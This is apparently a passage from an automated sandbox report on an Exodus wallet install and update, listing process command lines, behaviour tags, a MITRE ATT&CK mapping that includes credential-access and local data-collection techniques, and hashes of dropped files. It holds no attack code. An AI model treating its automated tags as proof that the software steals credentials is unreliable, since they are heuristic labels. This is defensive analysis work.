    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --field-trial-handle=2276,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2616
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-databases --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=2560,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:468
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-databases --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2784,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:228
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-databases --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2844,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2796 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1904
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3480,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2072
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3504,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3276
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:648
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3692,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2124
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3820,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2856 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5000
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-databases --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4716,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5356
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5256,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5376
- - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
    "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --secure-schemes=exodus-nfts-api --bypasscsp-schemes=exodus-nfts-api --fetch-schemes=exodus-nfts-api --app-user-model-id=com.squirrel.exodus.Exodus --app-path="C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources\app.asar" --autoplay-policy=no-user-gesture-required --disable-file-system --disable-notifications --disable-permissions-api --disable-presentation-api --disable-shared-workers --disable-speech-api --disable-blink-features=FileSystem,MediaSession,Serial,WebAuth,WebBluetooth,WebHID,WebNFC,WebOTP,WebUSB,WebXR,WebScheduler,WindowPlacement,WindowSegments --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5380,i,7360443855053405227,9878813843696368075,262144 --disable-features=Reporting,SpareRendererForSitePerProcess,WebAuthentication,WebGPUService,WebNFC,WebOTP,WebUSB,WebXR,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:1
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5388
- - C:\Users\Admin\AppData\Local\exodus\Update.exe
    C:\Users\Admin\AppData\Local\exodus\Update.exe --checkForUpdate https://updates.exodus.io/releases/feed-24.47.3/win32-x64
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3992
- - C:\Users\Admin\AppData\Local\exodus\Update.exe
    C:\Users\Admin\AppData\Local\exodus\Update.exe --update https://updates.exodus.io/releases/feed-24.47.3/win32-x64
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5384
  - - C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Squirrel.exe
      "C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Squirrel.exe" --updateSelf=C:\Users\Admin\AppData\Local\exodus\Update.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4156
  - - C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe
      "C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe" --squirrel-updated 24.47.3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:4164
    - - C:\Users\Admin\AppData\Local\exodus\Update.exe
        
        C:\Users\Admin\AppData\Local\exodus\Update.exe --createShortcut=Exodus.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2208
    - - C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1988,i,11936669566552761411,6433923957874967307,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1976 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2088
    - - C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.47.3\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --field-trial-handle=2484,i,11936669566552761411,6433923957874967307,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:3
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f9349064c7c8f8467cc12d78a462e5f9

SHA1
5e1d27fc64751cd8c0e9448ee47741da588b3484

SHA256
883481fe331cb89fb6061e76b43acd4dd638c16f499b10088b261036c6d0547b

SHA512
3229668491b5e4068e743b31f2896b30b1842faf96aff09fad01b08771c2f11eb8d8f02a3b76e31f0d6ad650c2894c5ac1822204e132c03d9c2b8df6ca4cd7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
4b3dc431ac7bdda5bc6fe18212db9a19

SHA1
f2695c04cc0c4f069674576d3ee02e00dad6927a

SHA256
eeba82aec123d204a2702c30636114f9174c57ae5053f5b83c4d9aa13b5b18b7

SHA512
d44ec75bf7a4fc407c5263c62e5651116007e8219ddb00eaa7cf8b263e36ef8b61da4a3acc6dfb14dea7a48c4f53a4b62edbf91ed2a1272566fac71d16d84801

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\RELEASES

Filesize
79B

MD5
c70eeb234d01bda96b536f2f7bc6faad

SHA1
d0b8bfd63f0b1c02bd1bc15c0e7505f2a052347e

SHA256
1247e2466d6afc66fdc0fc32647b7c6294f80bc3508f69fc87c4b234a61895db

SHA512
01b678e322c974e4e78decb2e53a1078de8f98bcf89a1ebf4dbbc2d64bcf69805c1c2a6d6a83bb63abf8081a69b2590b675997d893a6928cdea602370321b6df

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
1.7MB

MD5
c5f6cda4976ae38cd9fba3d1e5ebd244

SHA1
2006c37f01d010963a4331c42e579b87a2d16039

SHA256
dae7bd888b715b8e215482bc5ea6f028ded32a3ad88bf4acb6431d2a62ffe3f4

SHA512
a1a7529b0ceb3df471e803eac1d9256c009a9c8252884f64a28a59d59753c75e1bff726a35af02db5bdf20a2d194850bfdbed163722b09465ca32d10d059524d

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\background.gif

Filesize
10.7MB

MD5
9b01c5eab2c0bbf63c29944e485c062d

SHA1
a8182f1d6363817757d9a4c652ca78591826c803

SHA256
eb59903ac99cd42ace0b9204c6f2696c61ced7ff9c94e4da1334b3b5356655fc

SHA512
edd950fc94e1c06960541527fda50f2da2f6c99206b691ab465eef69fdae491ca9e3d9b29c3e322f3590a64c73e59c0f24028e873557037a9807e83d946a383b

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\setupIcon.ico

Filesize
352KB

MD5
f4fd06cc518f26026049ccce65a4ec81

SHA1
6298ba68c06b31f1ec19e7ce757c26ff3e6df3f7

SHA256
381905c1421a53741029db9ac3b9544bc39daabc8e14a8883ab0b64c5c0d2ca3

SHA512
e53583d6a33b8f4b8d9d71aa19b1027b2152e35bc1595ee62916be3f1eb95015b4b1ca70d6bdeaa54742c11a374ccd663062229ce22410dc3d2b96bf8d6538d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pl5z0vyp.irl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\exodus\Exodus.exe

Filesize
599KB

MD5
48e0b55498ee92bf6dacd3e850f799f5

SHA1
b4eaccd6a00778a2a26bce0f3053965516be0589

SHA256
330c1d6232c4b7d2d83a927512ffcc920020caa2ccd36c9cf14fd6b0577e5951

SHA512
911d69d2d5038553c7e9975e81557022cb67dc0858a94cdbfb3e5b865a087b1c245bd59a2ed227fbcc78a643bbfa3961cf389c63bb73314ecadd35c53b4b4c2e

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\chrome_100_percent.pak

Filesize
148KB

MD5
cb4f128469cd84711ed1c9c02212c7a8

SHA1
8ae60303be80b74163d5c4132de4a465a1eafc52

SHA256
7dd5485def22a53c0635efdf8ae900f147ec8c8a22b9ed71c24668075dd605d3

SHA512
0f0febe4ee321eb09d6a841fe3460d1f5b657b449058653111e7d0f7a9f36620b3d30369e367235948529409a6ce0ce625aede0c61b60926dec4d2c308306277

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\chrome_200_percent.pak

Filesize
223KB

MD5
e9c1423fe5d139a4c88ba8b107573536

SHA1
46d3efe892044761f19844c4c4b8f9576f9ca43e

SHA256
2408969599d3953aae2fb36008e4d0711e30d0bc86fb4d03f8b0577d43c649fa

SHA512
abf8d4341c6de9c722168d0a9cf7d9bac5f491e1c9bedfe10b69096dcc2ef2cd08ff4d0e7c9b499c9d1f45fdb053eafc31add39d13c8287760f9304af0727bf4

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\d3dcompiler_47.dll

Filesize
4.7MB

MD5
2ebe8347e29f95d17e07ac1e9261fb9f

SHA1
3569d60d4bdce9956ace1933520ef2ebce81c657

SHA256
dddd35ab70247996b77ea68237386bbdc47e63e4ae41bf3c4a6437e989c80bd6

SHA512
a6c93cf500196d5f9899667199f88142e21c2600676f9361c4729b5c11321828b6c9ee668b5555f8bc165077aa1860bfebc17301bef300aede5ad72447914c6b

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\ffmpeg.dll

Filesize
2.6MB

MD5
a05bb21301445c4c069442734f9c8cb0

SHA1
a136f0cdced8399e07e9d9989d9d3f8fe280b0ea

SHA256
0c23ab1b8b798a5df569652115bf9ac2cb5fee46fef53703bcaac2759fc1154a

SHA512
c00ce963d2165a29e64b8039a51a4fe332eada9b654e1234c57a0342306e81a3b16933480bb4742a3e946ea581b085f0a543e5bb867755689454ef385b03997d

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\icudtl.dat

Filesize
10.0MB

MD5
ffd67c1e24cb35dc109a24024b1ba7ec

SHA1
99f545bc396878c7a53e98a79017d9531af7c1f5

SHA256
9ae98c06cbb0ea43c5cd6b5725310c008c65e46072421a1118cb88e1de9a8b92

SHA512
e1a865e685d2d3bacd0916d4238a79462519d887feb273a251120bb6af2b4481d025f3b21ce9a1a95a49371a0aa3ecf072175ba756974e831dbfde1f0feaeb79

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\libGLESv2.dll

Filesize
7.7MB

MD5
65bfefc5ba9b91bb9d0f78e791286484

SHA1
4866c1dd11fe0ee98f68c3990ae13b6a3317795d

SHA256
9d0b22de4d28e3602db8d5cf79626503f879b8035dd3dfd94fbd49bf9b9152b7

SHA512
b53004dfa8dd9b4187b74724ce06e3b1b3b9254eb76b1b935e4575f4c963a2b9fc9018d8e667a412c9ff1afc1121a3375ba446b8ca592a9cf51cda0eb5fdd8cb

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\libegl.dll

Filesize
479KB

MD5
c44d0f8ddc7dadc835f366d827dd0831

SHA1
6dfcf00e1dd60dc6a030f7a86f73590eecb233ff

SHA256
a2fc88189a9e2b9a32be964e4f7b82b3caf1eaff23794e2c6b94bfae1864c595

SHA512
c190bf9c6a61b3ef2287e90147ad523eb8275338c731756fce3428ec422043c47da50722694d063f132f233a37c2303c4a34669b22920782401620d7afe156c1

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\locales\en-US.pak

Filesize
454KB

MD5
5c52a86b21633b55b383c20f16859b2f

SHA1
126585e68cb17f241351004e21c1d30e65de1cf6

SHA256
41123d72bd8e289e85bd35227aabb4cc61fe1de02b5cd7a7834e5ec200bc2078

SHA512
2a1b6a4becfb97d470cd7de74857edf2cc9cd4a77f377ccd9bf60c30539862ff1ac3ed6cc849632a3ed4ea0e5b92679f3cc5b4cb26cc7eaaa2bb2f4ae9974a6a

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources.pak

Filesize
5.3MB

MD5
756ffdd90a3e7837cb1d086e9d2a02a2

SHA1
594224dff9bc1b35368ece832e3ca43776e76743

SHA256
f299b8d2e59b047f8473e86d88a9ef20b447627c40b5d5a2ebb77c7144faca94

SHA512
198423de82a2f0747b722f1c965ede7760e4b2b5b1039c18fbadda2fa12f21013aa90b11521d16f94a04a74c2239ab5a82690d5bffbd0aeedb2b8ebece88e514

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\squirrel.exe

Filesize
2.1MB

MD5
5341b31761b38bb6a42cb155aaea8661

SHA1
46a98e293a2596d51c8d4171b39fa2549def9d96

SHA256
55f4fdbd5fc93ded3565dd1af4d16479be3a27dab565243464107d8a1b114685

SHA512
906583cd16ef56dfe13c44fbb4556a0d7d9160e63ab0e6d798d526f5cb7466812a6bbabe95448d339bf8a7ef740229ce39964d2502880ad996dba418d0da6080

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\v8_context_snapshot.bin

Filesize
646KB

MD5
a62fbbb671bf975ed46b42d9cf437bcd

SHA1
408b595b1dc6658533e0db1d35f509ab9ee70525

SHA256
a8bd22478c4f85afa836c89d3a7f52c606b17872fbbefce268b499bedede10ae

SHA512
87c934670df70afcced0ea5c73449a17ad27d5b6a25cedad9eb61634aaff8a42b713f578e861c2efbc77593793bba240a1495822b69c99a8ecaef64b07b6a62c

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\vk_swiftshader.dll

Filesize
5.2MB

MD5
6c15525e130834b1d10adba428499b8a

SHA1
d2d5d55fd05d54ee60ee8dcd1932e437e186b8d7

SHA256
257e0993508f2f09144401f2d21b138051da96ab733d07e75dd08dda436ca3b6

SHA512
7a429e16a3d2007ec21ca21ec091f7088e724ceeff85aab18c270367cbb2014657fc5a0a943a27edacce98d6c85fdfe015ebb04f83d13c7db094d8d5d62dc3a7

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
06b4202880674263dc00436db66f5c0b

SHA1
b78893cd9c8e1d5a579aeb7c9ea54a9f8236a95a

SHA256
55df5b9275c581217c2182283f371c662807d5b8e9611419d10cd961c2029994

SHA512
